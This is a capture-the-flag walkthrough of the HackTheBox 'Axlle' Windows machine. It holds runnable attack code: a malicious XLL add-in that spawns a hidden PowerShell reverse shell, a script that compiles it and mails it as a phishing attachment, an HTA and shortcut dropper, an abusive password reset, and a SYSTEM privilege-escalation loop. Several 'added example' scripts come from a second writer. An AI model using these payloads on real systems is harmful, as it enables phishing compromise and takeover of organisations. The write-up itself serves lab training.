Axlle is a hard-difficulty Windows machine from HackTheBox. The foothold comes from a phishing attack using an XLL Excel add-in file. A second phishing step, this time with .url web shortcuts that launch an .hta file, lands a shell as another user, and from there we abuse the Windows Kits StandaloneRunner to own the system. It was really fun!
```
PS C:\Users\0xkujen> nmap -A -Pn 10.129.217.166
Starting Nmap 7.95 ( https://nmap.org ) at 2024-11-15 10:59 W. Central Africa Standard Time
Nmap scan report for 10.129.217.166
Host is up (0.12s latency).
Not shown: 986 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: MAINFRAME, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Axlle Development
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-15 10:04:54Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: MAINFRAME; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 110.75 seconds
```
LDAP gives us the domain name for this machine, axlle.htb, so let's add that entry to our /etc/hosts file. Kerberos (88), LDAP (389/636/3268/3269) and DNS (53) all on one host, named MAINFRAME, tell us this box is the domain controller itself. One more interesting port is 25 for SMTP: hMailServer is running on it, which can be useful later on.
Checking the web interface, it looks like a plain static site without any special functionality or buttons. However, scrolling down a bit we can see an interesting message from the developers:
The interesting part is this: If you have any outstanding invoices or requests, please email them to accounts@axlle.htb in Excel format. Please note that all macros are disabled due to our security posture.
From this message we understand that we can email accounts@axlle.htb an Excel file (thinking about it, the machine name aXLLe makes sense now). Macros are disabled, but an XLL add-in is a compiled DLL rather than a VBA macro, so the macro restriction does not stop it. I instantly get the idea of sending a phishing email with a malicious .xll file and seeing what happens.
Doing some research I stumble upon this page from swisskyrepo (PayloadsAllTheThings). The payload goes into the xlAutoOpen callback, which Excel invokes as soon as it loads the add-in; you can generate the malicious PowerShell one-liner with https://www.revshells.com/:
```c
#include <windows.h>

// Excel calls xlAutoOpen when it loads the add-in; this is where the payload goes.
// Placeholder: replace the command with the PowerShell one-liner generated on revshells.com.
__declspec(dllexport) int WINAPI xlAutoOpen(void)
{
    WinExec("powershell -nop -w hidden -e <BASE64_REVSHELL>", SW_HIDE);
    return 1;
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
```
We save this code as note.c, compile it with x86_64-w64-mingw32-gcc (an XLL is just a DLL with the .xll extension, so a shared-library build is all it takes) and email the result to the accounts address using swaks, with a listener already waiting on port 9001.
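The build-and-send step spelled out, as an added example rather than the author's exact command line: the compile step uses the mingw cross-compiler named above, and PowerShell's Send-MailMessage talks to the hMailServer on port 25 directly (swaks does the same job). The recipient is the accounts mailbox quoted from the site; the sender address, subject and body are assumptions, as is the cross-compiler being on PATH.

```powershell
# Added example (not the author's script). Builds note.c into an XLL and mails it
# to the mailbox named on the website. Assumed: sender address, subject/body text,
# and that x86_64-w64-mingw32-gcc is on PATH.
$target = '10.129.217.166'
$to     = 'accounts@axlle.htb'   # taken from the site's "email your invoices" notice
$from   = 'finance@axlle.htb'    # assumed sender; the server did not ask us to authenticate

# An XLL is an ordinary DLL with the .xll extension: -shared builds the DLL, -s strips symbols.
& 'x86_64-w64-mingw32-gcc' -shared -s -o note.xll note.c
if ($LASTEXITCODE -ne 0) { throw "compilation failed" }

# Start `nc -lvnp 9001` in another window before sending.
Send-MailMessage -SmtpServer $target -Port 25 `
    -From $from -To $to `
    -Subject 'Outstanding invoice' `
    -Body 'Please find the invoice attached.' `
    -Attachments (Resolve-Path .\note.xll).Path
```

Send-MailMessage prints an obsolescence warning on newer PowerShell versions but still sends; the equivalent swaks invocation is `swaks --to accounts@axlle.htb --from <sender> --server 10.129.217.166 --attach note.xll`.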
A few seconds later the listener catches the callback:

```
PS C:\Users\0xkujen> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.217.166] 57935
whoami
axlle\gideon.hamill
PS C:\>
```
Pivoting to axlle\dallon.matrix - hta injection
The first thing that comes to mind, since we just phished through the hMailServer, is to check the mail inboxes on the box for any interesting incoming emails, and we do find something interesting:
This email talks about web shortcuts being placed inside C:\inetpub\testing for automation purposes (all I see is hacking purposes haha). So we can create a malicious .hta file, drop a shortcut to it in that directory and see what happens. This article from HackTricks was really useful. This will be my shell.hta file:
So it goes like this:
1- Create your malicious shell.hta under C:\Users\Public\Documents
2- Create shell.url under C:\inetpub\testing with contents pointing at the .hta file
3- Enjoy your shell :)
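The two files staged from the gideon.hamill shell, as an added example and not the author's own files. The HTA body follows the HackTricks pattern (WScript.Shell launching a hidden PowerShell); the base64 payload is a placeholder, and the file:// form of the shortcut target is an assumption on my part about what the automation will open with mshta.exe.

```powershell
# Added example (not the author's files). Drops shell.hta under Public\Documents and a
# web shortcut in C:\inetpub\testing that points at it. Assumption: the automation
# opens every .url in that folder with its default handler, so mshta.exe runs the .hta.
$htaPath = 'C:\Users\Public\Documents\shell.hta'
$urlPath = 'C:\inetpub\testing\shell.url'
$payload = 'powershell -nop -w hidden -e <BASE64_REVSHELL>'   # placeholder: paste your revshells.com one-liner

$hta = @"
<html>
<head>
<script language="VBScript">
  Set sh = CreateObject("WScript.Shell")
  ' 0 = hidden window, False = do not wait for the child to exit
  sh.Run "$payload", 0, False
  self.close
</script>
</head>
<body></body>
</html>
"@

$url = @"
[InternetShortcut]
URL=file:///C:/Users/Public/Documents/shell.hta
"@

Set-Content -Path $htaPath -Value $hta -Encoding ASCII
Set-Content -Path $urlPath -Value $url -Encoding ASCII

# Sanity check: both files exist and the shortcut really points at the HTA
Get-Item $htaPath, $urlPath | Select-Object FullName, Length, LastWriteTime
Select-String -Path $urlPath -Pattern '^URL='
```

Have `nc -lvnp 9001` listening before writing the shortcut; the automation picks the .url up on its next run, so the callback can take a minute.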
```
PS C:\Users\0xkujen> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.217.166] 60332
whoami
axlle\dallon.matrix
PS C:\>
```
We can now run BloodHound against the domain to see what juicy info we can extract. Our current user dallon.matrix is a member of the WEB DEVS group, which has ForceChangePassword on jacob.greeny:
Let's reset jacob's password and log in as him (he is a member of Remote Management Users, so WinRM on port 5985 is open to him):
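The reset and a sanity check before connecting, as an added example (not the author's exact commands). It runs from the dallon.matrix shell on MAINFRAME, which is the domain controller, so I assume the ActiveDirectory PowerShell module is installed there; the password value is the one the author chose.

```powershell
# Added example (not the author's commands). ForceChangePassword is the
# User-Force-Change-Password right, i.e. an administrative reset: no old password needed.
# Assumption: the ActiveDirectory module is available on the DC (it ships with the AD DS role).
Import-Module ActiveDirectory

$user = 'jacob.greeny'
$new  = ConvertTo-SecureString 'SuperSecuredPassword0xkujen123!' -AsPlainText -Force

# -Reset is the administrative reset path; without it the cmdlet would ask for the old password.
Set-ADAccountPassword -Identity $user -Reset -NewPassword $new

# Confirm the account is enabled, the reset landed, and WinRM access is granted by group membership
Get-ADUser $user -Properties Enabled, PasswordLastSet, MemberOf |
    Select-Object SamAccountName, Enabled, PasswordLastSet,
        @{ n = 'Groups'; e = { $_.MemberOf -replace '^CN=([^,]+).*', '$1' } }
```

If the module is missing, `net user jacob.greeny 'SuperSecuredPassword0xkujen123!' /domain` performs the same reset through SAMR. Then connect from Kali: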
```
┌──(kali㉿kali)-[~/Hackthebox/axlle]
└─$ evil-winrm -i 10.129.217.166 -u "jacob.greeny" -p 'SuperSecuredPassword0xkujen123!'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\jacob.greeny\Documents>
```
Checking the C:\ drive, there is an App Development folder that I found empty earlier; with this user it contains a kbfiltr directory with some interesting stuff in it:
```
*Evil-WinRM* PS C:\app development\kbfiltr> cat readme.md
# Keyboard Translation Program
This is an application in development that uses a WDF kbfiltr as the basis for a translation program. The aim of this application is to allow users to program and simulate custom keyboard layouts for real or fictional languages.

## Features
- Create custom keyboard layouts for real or fictional languages.
- Simulate keyboard inputs using the custom layouts.
- Secret codes to switch between languages and logging output.

## Progress
- kbfiltr driver - Complete
- Keyboard mapping - Complete (hardcoded in driver)
- Custom mapping in application layer - In progress
- Logging - Complete
- Activation of logging - Complete
- Simulation of other keyboard layouts - Incomplete
- Activation of other keyboard layouts - Incomplete

**NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment**

## Prerequisites
- Windows 10 or higher
- Visual Studio 2019
- Windows Driver Kit (WDK) 10

## Getting Started
- Clone this repository.
- Open the solution file in Visual Studio.
- Build the solution in Release mode.
- Install the driver by running `.\devcon.exe install .\kbfiltr.inf "*PNP0303"` as Administrator.
- Install the driver as an upperclass filter with `.\devcon.exe /r classfilter keyboard upper -keylogger` as Administrator.
- Install the application by running the install_app.bat file as Administrator.
- Reboot your computer to load the driver.
- Launch the application and start programming your custom keyboard layouts.

## Usage
### Programming a Custom Layout
- Launch the application.
- Click on the Program Layout button.
- Select the language for which you want to program the layout.
- Select the key you want to modify from the list.
- Modify the key's scancode and virtual key code as required.
- Repeat steps 4 and 5 for all the keys you want to modify.
- Save the layout by clicking on the Save Layout button.

### Simulating Inputs
- Launch the application.
- Click on the Simulate Input button.
- Select the language for which you want to simulate the input.
- Type in the input in the normal English layout.
- Trigger language switch as outlined below (when required).
- Verify that the input is translated to the selected language.

### Logging Output
- Launch the application.
- Turn on logging (shortcuts can be created as explained below)
- Use the application as normal.
- The log file will be created in the same directory as the application.

## Triggering/Activation
- To toggle logging output, set up a shortcut in the options menu. INCOMPLETE
- To switch to a different language, press the Left Alt key and the Right Ctrl key simultaneously. INCOMPLETE

## Bugs
There are probably several.
*Evil-WinRM* PS C:\app development\kbfiltr>
```
One interesting part is this:
**NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment**
Reading this note I instantly think about abusing standalonerunner.exe, since anything it can be made to execute will run as SYSTEM, and this GitHub repository comes in handy.
Here are the steps to follow, all inside the x64 directory that holds standalonerunner.exe:
1- Create a reboot.rsf file with this content (two lines: the test directory name, then True):

```
myTestDir
True
```

2- Create a myTestDir\working directory
3- Create an empty rsf.rsf file inside of it
4- Create a command.txt file containing our reverse shell command in the primary x64 execution directory
5- Enjoy your shell :)
I have created this mini script to automate the process, since everything gets deleted every few seconds:
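The staging loop written out, as an added example and not the author's own script. It assumes that reboot.rsf, the test directory and command.txt all live next to standalonerunner.exe in the x64 folder named in the readme, and that command.txt holds a single command line which the runner executes as SYSTEM; the payload is a placeholder.

```powershell
# Added example (not the author's script). Stages the standalonerunner.exe trigger files
# and keeps re-creating them, because the SYSTEM task consumes and deletes them every few seconds.
# Assumptions: every file lives under $base next to standalonerunner.exe, and command.txt
# holds one command line that the runner executes.
$base    = 'C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64'
$testDir = 'myTestDir'
$payload = 'powershell -nop -w hidden -e <BASE64_REVSHELL>'   # placeholder: your revshells.com one-liner

function Set-RunnerFiles {
    $working = Join-Path $base "$testDir\working"
    New-Item -ItemType Directory -Force -Path $working | Out-Null

    # reboot.rsf: line 1 = test directory name, line 2 = True
    Set-Content -Path (Join-Path $base 'reboot.rsf') -Value @($testDir, 'True') -Encoding ASCII

    # rsf.rsf only has to exist; -Force recreates it if the runner removed it
    New-Item -ItemType File -Force -Path (Join-Path $working 'rsf.rsf') | Out-Null

    # command.txt: what SYSTEM will run
    Set-Content -Path (Join-Path $base 'command.txt') -Value $payload -Encoding ASCII
}

# Re-stage every two seconds until the listener gets a shell; Ctrl-C to stop.
while ($true) {
    Set-RunnerFiles
    Start-Sleep -Seconds 2
}
```

Start `nc -lvnp 9001` first, then run the loop from the jacob.greeny WinRM session; once the callback arrives, `whoami` in the new shell confirms the SYSTEM context the readme promised.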